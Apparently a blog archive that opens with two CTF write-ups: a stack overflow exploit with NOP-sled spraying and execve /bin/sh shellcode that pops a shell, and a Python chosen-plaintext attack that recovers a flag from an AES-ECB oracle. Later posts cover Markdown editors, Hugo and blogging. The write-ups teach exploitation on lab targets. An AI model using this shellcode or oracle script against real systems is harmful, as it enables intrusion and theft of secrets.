$ ./overflowme `python -c 'print "\x30"*982'`

The Exploitation

Successful exploitation in a real-world scenario would require multiple prerequisite steps, but this is a simplified exploitaiton case. We just need to solve a few things.

  1. Determine the offset in the attack input at which it overwrites the stored return pointer. These bytes have to point to where execution should go.
  2. In order to complete step 1, determine the address where execution should go.

Let’s start with the 2nd thing. Check the process memory map by launching it under GDB and using ProcFS:

(gdb) start
(gdb) shell ps
# ... observe the PID of overflowme, it is 32687
(gdb) shell cat /proc/32687/maps
08048000-08049000 r-xp 00000000 ca:02 2490631     /problems/9ae8cc98f274aa6de77715eb9bdea7ed/overflowme
08049000-0804a000 rwxp 00000000 ca:02 2490631     /problems/9ae8cc98f274aa6de77715eb9bdea7ed/overflowme
f7570000-f7571000 rwxp 00000000 00:00 0
f7571000-f7718000 r-xp 00000000 ca:02 786437      /lib32/libc-2.19.so
f7718000-f771a000 r-xp 001a7000 ca:02 786437      /lib32/libc-2.19.so
f771a000-f771b000 rwxp 001a9000 ca:02 786437      /lib32/libc-2.19.so
f771b000-f771f000 rwxp 00000000 00:00 0
f772a000-f772b000 rwxp 00000000 00:00 0
f772b000-f772c000 r-xp 00000000 00:00 0           [vdso]
f772c000-f772e000 r--p 00000000 00:00 0           [vvar]
f772e000-f774e000 r-xp 00000000 ca:02 786434      /lib32/ld-2.19.so
f774e000-f774f000 r-xp 0001f000 ca:02 786434      /lib32/ld-2.19.so
f774f000-f7750000 rwxp 00020000 ca:02 786434      /lib32/ld-2.19.so
fff84000-fffa5000 rwxp 00000000 00:00 0           [stack]

The last memory range, [stack] is executable. You would not see this anymore these days, but this makes exploitation easier, it means shellcode in the buffer overflow input itself can run where it exists, directly. So we just need to check where the buffer is on the stack and put the address into the buffer and we’re good to go?

Well hold on. Recall that we saw ASLR was enabled in the OS. Let’s run it another time and see these maps again.

08048000-08049000 r-xp 00000000 ca:02 2490631   /problems/9ae8cc98f274aa6de77715eb9bdea7ed/overflowme           
08049000-0804a000 rwxp 00000000 ca:02 2490631   /problems/9ae8cc98f274aa6de77715eb9bdea7ed/overflowme
f75fd000-f75fe000 rwxp 00000000 00:00 0
f75fe000-f77a5000 r-xp 00000000 ca:02 786437    /lib32/libc-2.19.so
f77a5000-f77a7000 r-xp 001a7000 ca:02 786437    /lib32/libc-2.19.so    
f77a7000-f77a8000 rwxp 001a9000 ca:02 786437    /lib32/libc-2.19.so
f77a8000-f77ac000 rwxp 00000000 00:00 0
f77b7000-f77b8000 rwxp 00000000 00:00 0
f77b8000-f77b9000 r-xp 00000000 00:00 0         [vdso]
f77b9000-f77bb000 r--p 00000000 00:00 0         [vvar]
f77bb000-f77db000 r-xp 00000000 ca:02 786434    /lib32/ld-2.19.so
f77db000-f77dc000 r-xp 0001f000 ca:02 786434    /lib32/ld-2.19.so
f77dc000-f77dd000 rwxp 00020000 ca:02 786434    /lib32/ld-2.19.so
ffb9d000-ffbbe000 rwxp 00000000 00:00 0         [stack]  

See that the stack is at a different address. The OS has applied ASLR to the data segments and the shared libraries for libc and ld. However, the entirety of the program binary itself has not moved. That is, apparently overflowme was not even compiled with support for ASLR. Cool!

Our shellcode is on the stack though, and the stack is one of the parts of memory that is moving around on every run. But that’s what we need a pointer to! Our only hope, then, is to find an instruction somewhere in the static mappings that jumps execution back to the stack. Note: here is where I tried a number of unnecessary and fruitless solutions, thinking about this like a modern exploit developer (ROP gadgets, trampolines, etc.). If you just want to read the solution, skip to the next section where I “Phone a Friend.”

My goal was to find an “instruction gadget” within the static mapping that would effectively work as a JMP ESP or CALL ESP. Using hexdump -C | grep FF I looked for FF E4 or FF D4 sequences. This is an extremely crude way to do this, but keep in mind the binary is very small. Unfortunately, because it’s so small, there was also no occurence of either byte sequence.

If any of the general-purpose registers at the time of the function return happen to also hold pointers to the stack range, then we could trampoline through a JMP EAX/EBX/ECX/EDX or CALL EAX/EBX/ECX/EDX, etc. So I also looked for any of these sequences. I found an FF D0 (call EAX), and a FF D2 (call EDX)! Good, but do we control either of those registers? Check: (gdb) info registers:

eax            0x0      0                         
ebx            0xffa5d5a0       -5909088
ecx            0xf7726878       -143497096
edx            0x0      0
…
esp            0xffa5d56c       0xffa5d56c
ebp            0xffa5d588       0xffa5d588 

annnnd no, they’re both 0x0 by the time the attacker gets control of EIP. But what’s this, EBX points into the stack (verified by another look at the /proc/PID/maps):

ffa3e000-ffa5f000 rwxp 00000000 00:00 0		[stack]  

But alas, poring over the hexdump of the static mappings in memory, there is no CALL EBX (FF D3) or JMP EBX (FF E3) gadgets! There’s not even something more indirect, like a PUSH EBX; RET (53 C3).

Another idea was to try to jump to one of the GOT entries, but this is a tiny little toy binary! It doesn’t import anything useful, as we see with objdump -T:

DYNAMIC SYMBOL TABLE:                                                          
00000000      DF *UND*  00000000  GLIBC_2.0   printf                           
00000000      DF *UND*  00000000  GLIBC_2.0   fflush                           
00000000      DF *UND*  00000000  GLIBC_2.0   getegid                          
00000000      DF *UND*  00000000  GLIBC_2.0   puts                             
00000000  w   D  *UND*  00000000              __gmon_start__                   
00000000      DF *UND*  00000000  GLIBC_2.0   __libc_start_main                
00000000      DF *UND*  00000000  GLIBC_2.0   sprintf                          
00000000      DF *UND*  00000000  GLIBC_2.0   setresgid                        
08049a40 g    DO .bss   00000004  GLIBC_2.0   stdout                           
0804872c g    DO .rodata        00000004  Base        _IO_stdin_used 

If there was a system() in here or something it would be a different story maybe, but as is, there are no useful standard library calls in this table.

The ROP approach to this has failed me.

Phoning a Friend

At this point I called a smart friend of mine for a tip on how to jump the instruction pointer to this stupid shellcode on the stack. We discussed more advanced gadget-finding using Z3 solvers and all sorts of stuff, but ultimately the hints that stuck with me were:

  • Duh, you can stack spray like it’s 1992: just make your input 100KB, NOP-sled to the end where shellcode lies, and re-run the exploit until it works by chance (until the input happens to inhabit a range around the address we choose to put in the overflowed return pointer).
  • You can store an arbitrary amount of NOP-sled in an environment variable and it will all get located in the stack segment.

Making It Work

Okay, so I have a good idea of how to (messily and probabilistically) get a successful exploit. The only thing I skipped over earlier was determining exactly how many bytes offset into the attack input we need to place the pointer. The way you do this is to use an exploit pattern string, such as you can generate online here or offline using various tools, and then watch the value of EIP when the process crashes under GDB:

$ gdb --args ./overflowme Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B
(gdb) b vuln
(gdb) run
(gdb) ni
# etc ...
(gdb) info registers
# I observe that the bytes from the pattern that fill EIP (little endian, remember) are "g8Bg".

I chose a pointer that was in the middlish-range for the stack: 0xff881111, converted it into little-endian order, and put it into the attack string at the same location. We can confirm:

$ gdb --args ./overflowme $(python -c 'print "A"*985 + "\x11\x11\x88\xff"')
(gdb) b vuln
(gdb) run
(gdb) ni
# etc ...
(gdb) info registers
# I observe that EIP is 0xff881111. Maybe it doesn't point into the stack on THIS run but it sometimes will, which is all we need, since we're allowed to retry the attack until it does.

Putting it all together:

# Store a NOP sled of 0x90 bytes and the shellcode at the end, in the stack via an env. var.:
$ export SHELLCODE=$(python -c 'print "\x90"*100000 + "\x31\xC0\xF7\xE9\x50\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x50\x68\x2D\x69\x69\x69\x89\xE6\x50\x56\x53\x89\xE1\xB0\x0B\xCD\x80"')

# Point to the stack, and keep running the attack until it works: the ol' "spray & pray"
$ for i in {1..100}; do ./overflowme $(python -c 'print "A"*985 + "\x11\x11\x88\xff"'); done

# Boom, it pops a shell:
$ ls
key  overflowme  overflowme.c                                                  
$ cat key
bb379544581fa2b010d958d6e78addfa

12 Feb 2017, 13:40

Enigma2017 CTF Broken Encryption Writeup

There is a new “Jeopardy style” security CTF web framework (CTF-as-a-Service?) called HackCenter that just debuted from For All Secure, the CMU-affiliated security startup known for winning last year’s DARPA Cyber Grand Challenge Final Event with their game-playing “automated exploit generation” system they called Mayhem CRS. HackCenter is their “other” technology, I guess, and right now the only CTF they’ve hosted is/was the one that occurred at Enigma2017 USENIX conference at the end of January. It seemed to be marketed as educational: “learn to hack!” and not as unfriendly and elitist as some of the more competitive CTFs, so I gave it a look. Also, this was a chance to refresh myself on some Python.

The Challenge

They give us a telnet server that prompts us to send whatever string we want, and then it sends back an encrypted version of that string. Also they give us this source code for the server:

#!/usr/bin/python -u
from Crypto.Cipher import AES

flag = open("flag", "r").read().strip()
key = open('enc_key', 'r').read().strip().decode('hex')

welcome = """
************ MI6 Secure Encryption Service ************
                  [We're super secure]
       ________   ________    _________  ____________;_
      - ______ \ - ______ \ / _____   //.  .  ._______/ 
     / /     / // /     / //_/     / // ___   /
    / /     / // /     / /       .-'//_/|_/,-'
   / /     / // /     / /     .-'.-'
  / /     / // /     / /     / /
 / /     / // /     / /     / /
/ /_____/ // /_____/ /     / /
\________- \________-     /_/

"""

def pad(m):
  m = m + '1'
  while len(m) % 16 != 0:
    m = m + '0'
  return m

def encrypt():
  cipher = AES.new(key,AES.MODE_ECB)

  m = raw_input("Agent number: ")
  m = "agent " + m + " wants to see " + flag

  return cipher.encrypt(pad(m)).encode("hex")

print welcome
print encrypt()

We also get a web shell on hackcenter.com: literally an in-browser terminal emulator connected to the remote server (we do not have read access to the directory with “flag”), but for this problem we will just open our local Terminal app and poke around.

Anything ECB is Bad Mmmkay

Look at the source: basically, "agent " + yourinput + " wants to see " + flag is padded out to the next nearest AES block length (128 bits == 16 bytes) and then encrypted with AES-ECB using whatever the key is. Now, basically the first thing you learn about block ciphers is to never use the Electronic Code Book (ECB) mode. You’ll see a photo of Tux the Linux mascot encrypted with AES-ECB and how you can still see the edges of the image in the encrypted version. But that’s about it. It’s rare to see an explanation of why this is relevant or how to break it. Just, “everyone knows it’s bad.”

The reason why ECB mode of any block cipher is bad is that the same input always encrypts to the same output. The input is broken into fixed-length blocks and encrypted, and all of the blocks of identical input will create similarly equal output blocks. The data is all encrypted, but we know where their plaintexts were the same. There is no key recovery attack against this issue, at least not that I am aware of, but the problem is that the plaintext can be guessed. There are two basic attacks against ECB:

  1. Given enough encrypted blocks and some partial knowledge of the plaintext (known offsets of fixed data, like as defined by filetype formats or communication protocols), statistical and frequency analysis (and some guessing, then confirming) can reveal partial plaintext.
  2. Given the ability to prefix or circumfix (that means insert in the middle somewhere) arbitrary plaintext, and then have it encrypted and view the resulting ciphertext, an attacker can stage what cryptographers call a Chosen Plaintext Attack (CPA). The scenario of passing arbitrary plaintext to a remote encryptor and receiving the ciphertext back is also called an Oracle. This is the attack we will discuss in this post.

The reason why this is relevant is that to the average programmer who can’t be bothered, ECB looks like a valid mode choice for AES, a cipher that people generally recommend: “military grade crypto,” right? They might use it to encrypt the cookie their web site stores in your browser. Or if they’re especially ignorant in security like the people who work at Adobe, they might use it to encrypt their users’ passwords on the server.

Breaking ECB with the Chosen Plaintext Attack

Being able to circumfix our arbitrary input into the plaintext (at a known location in that string) means that we can choose an input such that we can fully align our known substring on an AES block boundary. Thus allowing us to test what the ciphertext is for any arbitrary block that we choose.

"agent " + yourinput + " wants to see " + flag + padding
(6 chars)  (n chars)    (14 chars)   <—- if you want to test-encrypt a single block of arbitrary input, put your test input on a 16-byte block boundary, like so: yourinput = "01234567891000000000000000". "1000000000000000" is at bytes 16 through 31 of the input, aka the second AES (128-bit, 16-byte) block.

We don’t know how long the flag is, but we know how the padding is applied: if the plaintext message does not end on a 16-byte boundary, then it is extended by a single “1” and up to 14 “0” characters. If the plaintext message does end on a 16-byte boundary, then it is extended by a full block of padding: 1000000000000000. This may seem counter-intuitive, but there always has to be padding in a block cipher, even when the message length already is a multiple of the block length: otherwise how would you know if the last block is padding or if 1000000000000000 was part of the message?

See where we’re going with this? We will give the above plaintext, and observe the output’s 2nd block. That is the exact same output we would expect to see as the last block of ciphertext if the flag ends at a block boundary and the final block were AES padding.

Agent number: 01234567891000000000000000
ceaa6fa24a71971f21413c1ea39f4e7c53b1c1d36d11a2c20dfc3913bb299f11c9777890922460e74fefb1a94f5c95df0ebb6d7bc5a7922f0857283feb2b068dc5148be36b7670e2ca4fe52c3f65c37612b88acbe4bbd5a9f2588bbc4e0ea92453b1c1d36d11a2c20dfc3913bb299f11

Note the second block (32 hex characters = 16 bytes) of ciphertext is 53b1c1d36d11a2c20dfc3913bb299f11c and, through a stroke of luck, we’ve already aligned the overall message on a block boundary too, as we see 53b1c1d36d11a2c20dfc3913bb299f11c is also the last block of ciphertext!

The game now is to insert one additional byte of arbitray text in order to push a single byte of the “flag” portion of the string rightward into the padding block. The final padding block will be n100000000000000 where n is the unknown byte of flag.

What will we do then to guess that byte? We’ll brute-force it: send new plaintext messages for all 255 possibilities of n in our block-aligned arbitrary input (which is the 2nd block). When the ciphertext’s 2nd block matches the ciphertext’s 7th block, then we know we guessed correctly. Then we’ll insert one additional byte again at the same location, and repeat this process. In other words, we expect to send a series of messages like the following:

0123456789a100000000000000
0123456789b100000000000000
0123456789c100000000000000
0123456789d100000000000000
0123456789e100000000000000 ... let's say that ciphertext blocks 2 and 7 match at this point!
0123456789ae10000000000000
0123456789be10000000000000
0123456789ce10000000000000
0123456789de10000000000000
0123456789ee10000000000000
0123456789fe10000000000000 ... they match again. We so far know last block = fe10000000000000
0123456789afe1000000000000
0123456789bfe1000000000000
and so on, and so on... up to 255 guesses per byte and as many bytes as we need to discover

In practical terms, we can try guessing only in the ASCII range of 0x20-0x7E or so, since we expect the secret in this case to be plaintext (the “flag”). This will speed things up by more than double.

Putting it All Togther: A Solution in Python

Knowing what to do is half the battle. The other half is coding it up and tearing your hair out over data alignment issues and dynamic typing issues.

#!/usr/bin/python

# Enigma2017 CTF, "Broken Encryption"

import sys
import time       # for using a delay in network connections
import telnetlib  # don't try using raw sockets, you'll tear your hair out trying to send the right line feed character

__author__ = 'michael-myers'

# TODO: I'm interested in any more elegant way to block-slice a Python string like this.
# Split out every 16-byte (32-hex char) block of returned ciphertext:
def parse_challenge(challenge):
    ciphertext_blocks = [challenge[0:32], challenge[32:64], challenge[64:96],
                         challenge[96:128], challenge[128:160], challenge[160:192],
                         challenge[192:224], challenge[224:]]
    return ciphertext_blocks


# To attack AES-ECB, we will be exploiting the following facts:
#   * we do not know all of the plaintext but we control a substring of it.
#	* the controlled portion is at a known offset within the string.
#   * by varying our input length we can force the secret part onto a block boundary.
#   * we can choose our substring to be a full block of padding & align it at a boundary.
#   * if the message ends at a block boundary, the last 16-byte block will be all padding.
#   * thus we know when the secret part is block aligned; we'll see the same ciphertext.
#   * there is no nonce or IV or counter, so ciphertext is deterministic.
#   * by varying length of plaintext we can align the secret part such that there 
#		is only one unknown byte at a time being encrypted in the final block of output. 
#	* by varying one byte at a time, we can brute-force guess input blocks until we
#       match what we see in the final block, thus giving us one byte of the secret.
#   * we will limit our guesses to the ASCII range 0x20-0x7E for this particular challenge.
#
# Begin by changing the 2nd block of plaintext to n100000000000000, where n is a guess. 
# If the ciphertext[2nd block] == ciphertext[7th block] then the guess is correct,
# otherwise increment n.
def main():
    # If the Engima2017 servers are still up: enigma2017.hackcenter.com 7945
    if len(sys.argv) < 3:   # lol Python doesn't have an argc
        print 'Usage : python CTF-Challenge-Response.py hostname port'
        sys.exit()
    host = sys.argv[1]
    port = int(sys.argv[2])
    
    guessed_secret = ""

    # Our input pads to the end of the 1st block, then aligns a guess at block 2.
    # Because we need to constantly alter this value, we are making it a bytearray. 
    # Strings in Python are immutable and inappropriate to use for holding data.
    chosen_plaintext = bytearray("0123456789" + "1000000000000000")

    # Guess each byte of the secret, in succession, by manipulating the 2nd plaintext
    # block (bytes 10 through 26) and looking for a matched ciphertext in the final block:
    for secret_bytes_to_guess in range(0, 64):
        # Add in a new guessing byte at the appropriate position:
        chosen_plaintext.insert(10, "?")

        # Guess over and over different values until we get this byte:
        for guessed_byte in range(0x20, 0x7E):  # this is the printable ASCII range.
            chosen_plaintext[10] = chr(guessed_byte)

            tn = telnetlib.Telnet("enigma2017.hackcenter.com", 7945)
            tn.read_until("Agent number: ")

            # Telnet input MUST BE DELIVERED with a \r\n line ending. If you send
            # only the \n the remote end will silently error on your input and send back
            # partially incorrect ciphertext! Untold hours debugging that bullshit.
            # Here we carefully convert the bytearray to ASCII and then to a string type, 
            # or else telnetlib barfs because of the hell that is dynamic typing.
            send_string = str(chosen_plaintext.decode('ascii') + "\r\n")
            tn.write(send_string)

            challenge = tn.read_all()
            tn.close()
            # time.sleep(0.5)   # (optional) rate-limit if you're worried about getting banned.

            ciphertext_blocks = parse_challenge(challenge)
            print "Currently guessing: " + chosen_plaintext[10:26]  # 2nd block holds the guess
            print "Chosen vs. final ciphertext blocks: " + ciphertext_blocks[1] + " <- ? -> " + ciphertext_blocks[6]

            # We're always guessing in the 2nd block and comparing result vs the 7th block:
            if ciphertext_blocks[1] == ciphertext_blocks[6]:
                print "Guessed a byte of the secret: " + chr(guessed_byte)
                guessed_secret = chr(guessed_byte) + guessed_secret
                break   # Finish the inner loop immediately, back up to the outer loop.

    print "All guessed bytes: " + guessed_secret

    print("Done")


if __name__ == "__main__":
    main()

And, after all of this, we uncover the flag: 54368eae12f64b2451cc234b0f327c7e_ECB_is_the_w0rst

05 Feb 2017, 03:05

The markup language known as Markdown

What it Is

Markdown is a lightweight markup language (as opposed to a heavyweight one like HTML or LaTeX). If you’ve ever taken plain-text file notes and used an asterisk to represent a bullet point, or a line of dashes like an underline for a heading, then you’ve basically already written Markdown. Markdown is a natural-looking “syntax” that lets you turn text like this:

## What it is
[Markdown](https://en.wikipedia.org/wiki/Markdown) is a *lightweight markup language* (as opposed to a **heavyweight** one like HTML or LaTeX).

into the HTML+CSS page that you’re looking at right now. We’ve all known that annoying nerd who refuses to send HTML-formatted emails and insists on sending plain text peppered with slashes and asterisks instead of italics and bold? Yea, basically a guy like that turned it into a semi-official standard, and now instead of being imaginary italics and bold, it actually renders that way.

Why Not Just Write in HTML Directly?

I think this is best explained by Brett Terpstra here. Basically, HTML sucks to work in, if you’re just trying to write some content. HTML is tedious, hard on the eyes, and error prone. If you want a site to look good at all, it also needs CSS, and that sucks even worse. Real people don’t want to work in either one, they just want to write prose and have it look good. For this, you can use Markdown as a standard format for your thoughts, and then let a static site generator (like Hugo) turn it into a web page. Be a writer, not a website developer, is the thinking.

Editors

I went looking for the ideal text editor in which to edit Markdown files. Ideally I could find something that ran on both MacOS and Linux, just for consistency since I use both. But Markdown is a standard format so I would also settle for the best on each respective platform, even if I had to use two different editors.

If there is one thing that gets reinvented most often, it’s text editors. Programmers love to re-solve their own nerd problems rather than tackle real-world problems, and one problem every programmer has is editing text. So there are about 500 choices of text editor at this point, but I narrowed it down to these 7 just on the basis of using them to edit Markdown.

MarkdownEditors

If the job is programming, a text editor should have code-completion and syntax highlighting. But if the job is editing a markup language, WYSIWYG is the number one thing I care about. So you notice I am not even considering the Vims and Emacs of the world. The whole point of Markdown was to be easy: easy for a human to read in its raw state, easy to edit. But I guess I would take this sentiment a little bit further: why should I have to look at markup language at all? It’s 2017, shouldn’t I have an editor at least as good as WordPad from Windows 95? Of course, I want it to be able to flip back to the raw “source” markup when necessary, but most of the time I just want to edit it the way it’s going to look when I’m done.

This is a surprisingly uncommon feature. It seems that most editors have adopted the two-view or split-window paradigm seen in editors for more complicated markup and typesetting languages like LaTeX. They present the raw Markdown source on the left, and the rendered version on the right. Booooo. The concept of Auto-save, on the other hand, is a ubiquitous feature nowadays. That’s great to see.

TextNut Typora HarooPad Quiver Atom Sublime Texts
WYSIWYG Yes Yes No No No No Yes
Easy to Use Yes Yes Yes Yes No No Yes
Both Mac & Linux No Yes Yes No Yes Yes No
Free / OSS No ($25) No (Beta) Yes No ($10) Yes No ($70) No ($20)
Auto-save Yes Yes Yes Yes Yes Yes Yes
Work Directly in .md No* Yes Yes No* Yes Yes Yes
Leaves TOML Intact Yes Yes Yes Unknown Yes Yes No

* = TextNut can open and edit a .md file, but the WYSIWYG aspect only works when it is “imported” to the proprietary format and edited there, then exported back to Markdown. Quiver has similar focus on Notes and a similar weakness in working in .md directly: basically it’s a less capable TextNut.

I like Texts, but it breaks the “front matter” on a Hugo post, so that’s a deal-breaker. HarooPad, besides having a lack of documentation in English and development that has been dead for a couple of years, is pretty robust. If it could only offer WYSIWYG editing I think it would have been my choice.

So the overall winner for me is Typora. Eventually it will leave beta, and they’ll charge for it, but hopefully it’s something reasonable. Until then, it’s free!

QuickLook for .md Files (MacOS)

I am all about using QuickLook in MacOS. You just hit space bar on a file in Finder and you get a perfectly good read-only peek at the file. But it doesn’t handle Markdown (as plain text, let alone as a rendered view). Fortunately someone made a QuickLook generator you can install using Homebrew: brew install Caskroom/cask/qlmarkdown.

Now you’re ready to work with Markdown files!

It’s Not All Roses Though: Behind the Scenes on This Post

The rendering of your content doesn’t always turn out the way you envisioned. When this happens, it’s either your Hugo theme, or the Markdown renderer that is to blame. Unfortunately, this might mean rolling up your sleeves and fixing CSS, as I had to do in order to get the table above to look decent. Hopefully this is a one-time thing. I had to go into the purehugo theme subdirectory, and edit static/all.min.css within that.

Secondly, when editing Markdown to embed an image from a local directory (as I’ve done above), Hugo requires you to put the files in /static and then in the Markdown you specify a relative path without a leading slash, such as ![MarkdownEditors](img/markdownEditors.png) (actual path of the image in the source tree is /blog/static/img/markdownEditors.png) and Hugo will copy it to the publishdir during rendering. Because of this, you can’t actually see the image in your Markdown editor, which sucks, and your source tree will have two copies of the file, which also sucks.

03 Feb 2017, 19:07

Hugo, the static site generator

Hugo, a Static Site Generator

In my last post, I covered the rationale behind using a static site generator. Static site generators are not just for creating blogs. They can also be used to create online resumes, company sites, online documentation, etc.

The default choice for static site generator is Jekyll, which has the most support, but it’s troublesome to install and use. Hugo is a popular alternative that is easier to install, and faster to work with. It’s implemented in Golang, a.k.a. Go. This means it is written in a statically compiled language (The Best Kind) and is completely dependency free. Dependency hell is the bane of my existence. It’s like work that you have to do before you can start working. Anyway, let’s look at how to get started.

Hugo Install Process (MacOS)

This is so simple, and its simplicity is the reason why I went with Hugo after trying the more popular Jekyll, which was a mess.

brew update && brew install hugo
hugo new site myBlog
cd myBlog
git clone https://github.com/dplesca/purehugo.git themes/purehugo
echo "theme = purehugo" >> config.toml 

Creating or customizing themes is beyond the scope of this post, but what we are doing here is “installing” a pre-baked Hugo theme, and then setting it as our default.

Hugo Workflow: Drafting & Publishing a Post (MacOS)

In order to create a new post for your blog:

cd myBlog
hugo new post/myReviewOfHugo.md
open content/post/myReviewOfHugo.md # write the post in your text editor

# Optional: launch a local webserver, give it a sec, and preview the blog
hugo server & sleep 2 && open http://localhost:1313/blog/
killall hugo # because we left hugo running in the background there

While the server is running, you can actually continue to edit the post in your editor. The server will live update the view in your browser. This is optional, but it will verify that everything will look correct when you publish.

When you’re satisfied, you can generate the actual web content to disk, and publish it. The following steps assume you are using Github Pages, so the publish is made using a git push.

# You must already have a GitHub project, and in its settings page, and have set the GitHub pages to "master branch / docs". In this example, the project name is "blog".

# These are the one-time Hugo steps:
echo "publishDir = docs" >> config.toml
echo "baseURL = https://myname.github.com/blog" >> config.toml

# These are the one-time Git steps:
rm -rf themes/.git # delete existing git files so they don't interfere
git init  # turn this directory into a git repo
git remote add origin https://github.com/myname/blog.git

# These are the only steps needed every time you publish new content:
hugo  # this generates HTML + JS + CSS under the publishdir (blog/docs/)
git add -A
git commit -m "Add a blog post about whatever."
git push

That’s all there is to it, although you can always use a different Git client if you don’t like the command line. I sure as hell don’t like it (I use Atlassian Sourcetree) but it’s up to you.

Post Metadata: WTF is “Front Matter” ?

In each post (each Markdown file), there is some metadata in a header at the top of the file, called “front matter.” Jekyll was the first to introduce this concept (in name, at least), but it is common across other static generators now. Hugo lets you write front matter in YAML, JSON or TOML (the default). If you’ve worked in web development surely you’ve heard of JSON, but now you may be asking WTF is YAML and TOML?

These are syntaxes invented specifically for controlling the settings of static site generators. It seems to be a case of “reinventing the wheel” of INI files, which have been around for decades. Basically, a config file. Key-value pairs. Associative array. Hash table (please don’t shorten it to just “hash,” words have meanings, know the difference). Dictionary. They’re all basically the same thing. YAML started in 2009 or so, as a minimalist-syntax alternative to JSON, which itself was a minimalist alternative to XML. We’ll get this right some day.

The CEO of GitHub and inventor of Jekyll, probably high on the smell of his own farts, in 2013 decided that YAML needed to be even more minimal, and renamed this idea after himself (“TOM”), and thus was born TOML, which primarily because of the fame of the creator has now spread to a few other projects. Thus, we have minimalized almost all the way back to INI files (except now it has been “standardized”). Progress.

Oh and by the way, none of these are actually markup languages at all. They just aren’t. The insistence on propagating the use of the acronym letters -ML for config file formats is basically an inside joke at this point.

The takeaway for me is that in the mid-2000s it became fashionable to ditch braces and brackets in all syntax for everything, in favor of careful indentation. Thus returning to the fashion of the 1970s and FORTRAN. You know what’s popular today, though? Look at Go, Rust, and Swift. Yea that’s right, compiled languages with curly braces are back again. Urge to kill risinnnnnnng. All right, deep breaths.

Anyway, within this “front matter,” you can define tags and categories, timestamps, and titles for every post. For examplte, the front matter for this post was defined as such:

+++
Tags = ["web","blogging","Hugo", "Jekyll", "YAML", "TOML"]
Description = "Initial impressions on the static site generator, Hugo"
date = "2017-02-03T19:07:12-05:00"
title = "Hugo, the static site generator"
Categories = ["web","blogging","Hugo"]
+++

You can also set optional variables like a publish date in the future (Hugo will not render it to the content directory until this date), or an alias (if you want to forward visitors from another URL to this post instead).

The configuration file for your Hugo site, config.toml, is also in this syntax.

That more or less covers the basics of Hugo, and static site generators like it. My next post will be about Markdown (an actual markup language).

03 Feb 2017, 15:43

How to Blog in 2017

My first blog, back in the early 2000s, was on a hosted blogging platform known as Blogger. It was simple and convenient: as the admin you just logged into the Blogger service, edited posts in your browser, and hit publish. This is basically how Tumblr still works today, although Tumblr’s innovation was to include media file hosting and allow everyone to repost each others’ content.

But Blogger content was static, and textual. You could post a few paragraphs of text, and embed images if they were hosted elsewhere. Only later did Google buy out the service and integrate it with their photo-hosting service. In the mid-2000s, many geeks wanted more flexibility, like the ability to limit access to members only, integrate their own photo/video/audio collections, and – most importantly – control the appearance of their blog.

So my second blog was generated with a Web Content Management System (CMS) and self-hosted on a home Windows XP PC running the “WAMP” software stack, with a DNS record from a free dynamic DNS service. If you’re a system admin or security expert you’re probably cringing. I am too. In hindsight, it’s a miracle if that PC was not 0wned by a hacker at some point, but at least I have no evidence to believe it was. But I thought my blog was pretty cool, it had a custom look, custom domain name, its own forums, file storage, a weather widget on the sidebar. I believe it was using the Drupal CMS. The 2000s saw this rise of the “web app,” a concept that an application was something that ran in a scripting language on a web server and presented you with a web page as the user interface. As a system programmer who thinks an application is a single self-contained compiled binary, I thought this was an anathema. But the rest of the tech world decided otherwise: websites that were not database-backed and server-side-scripted were totally 90s! That meant lame. 90s wasn’t cool again yet.

The reason why the self-hosted CMS approach to blogging is cringey is that it is notoriously difficult to secure a CMS, especially one written in PHP. PHP is now known to be prone to reoccuring security issues because of flaws in its design (unvalidated input, access control problems, command injection issues, etc.), and the use of a SQL database means fighting a war agains SQL injection attacks from anyone who uses your site. Spammers will leave spam comments. You just want to run a blog, but now you’re a system admin for a web server, a database admin for a database, and you have to understand the PHP (or Java, or whatever) that generates your site on the fly every time a visitor loads a page. If you ever want to use a web hosting service for your CMS-based site instead of hosting it at home, you have to pay real money, because supporting and securing Apache, PHP, and MySQL is a full-time job! On top of all of that, all of this script and database stuff makes the site is slower to load, and prone to Denial of Service attacks.

